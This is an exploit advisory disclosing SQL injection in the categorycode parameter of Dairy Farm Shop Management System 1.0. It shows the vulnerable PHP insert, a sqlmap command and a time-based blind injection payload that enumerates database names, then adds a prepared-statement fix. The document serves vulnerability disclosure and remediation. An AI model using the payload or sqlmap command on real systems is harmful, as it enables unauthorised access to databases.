# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection
# Date: 2020-07-23
# Exploit Author: Mehmet Ayberk Annadınc
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Microsoft Windows, Kali Linux
Source Code (add-category.php):
$catname=$_POST['category'];
$catcode=$_POST['categorycode'];
// Both POST values are interpolated straight into the SQL string; there is no escaping,
// no type check and no parameter binding, so the input becomes part of the query text.
$query=mysqli_query($con,"insert into tblcategory(CategoryName,CategoryCode) values('$catname','$catcode')");
if($query){
    echo "<script>alert('Category added successfully.');</script>";
    echo "<script>window.location.href='add-category.php'</script>";
} else{
    echo "<script>alert('Something went wrong. Please try again.');</script>";
    echo "<script>window.location.href='add-category.php'</script>";
}
} // closes an enclosing block that is not shown in this excerpt
PoC:
The categorycode parameter is affected.
The sqlmap command used is: sqlmap -r sq1 --dbms=mysql -v 3 --dbs (sq1 is the saved HTTP request file).
The time-based blind payload sqlmap found is: 1' AND 6539=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),15,1))>1),SLEEP(1),6539) AND 'bRmM'='bRmM
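Fix for the vulnerable insert above, added here as an example and not part of the advisory or the vendor's code: the same statement with a mysqli prepared statement so both POST values are bound as data instead of being spliced into the SQL text. It assumes $con is the application's existing mysqli connection.

```php
<?php
// Added hardened version of the add-category.php insert (not the vendor's code).
// Assumes $con is the existing mysqli connection the application already opens.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

$catname = $_POST['category'] ?? '';
$catcode = $_POST['categorycode'] ?? '';

// Placeholders keep user input out of the query text. The values are sent to the
// server separately, so the SLEEP()-based payload from the PoC is stored as a
// literal string in CategoryCode rather than evaluated by MySQL.
$stmt = $con->prepare(
    "INSERT INTO tblcategory (CategoryName, CategoryCode) VALUES (?, ?)"
);
$stmt->bind_param('ss', $catname, $catcode);

try {
    $stmt->execute();
    echo "<script>alert('Category added successfully.');</script>";
} catch (mysqli_sql_exception $e) {
    // Log the real error server-side; never echo database errors to the browser.
    error_log('add-category insert failed: ' . $e->getMessage());
    echo "<script>alert('Something went wrong. Please try again.');</script>";
}
$stmt->close();
echo "<script>window.location.href='add-category.php'</script>";
```

The same change applies to every other mysqli_query() call in the application that interpolates $_POST or $_GET values; a quick grep for `mysqli_query($con,"` with a `$` inside the quoted SQL finds the remaining candidates.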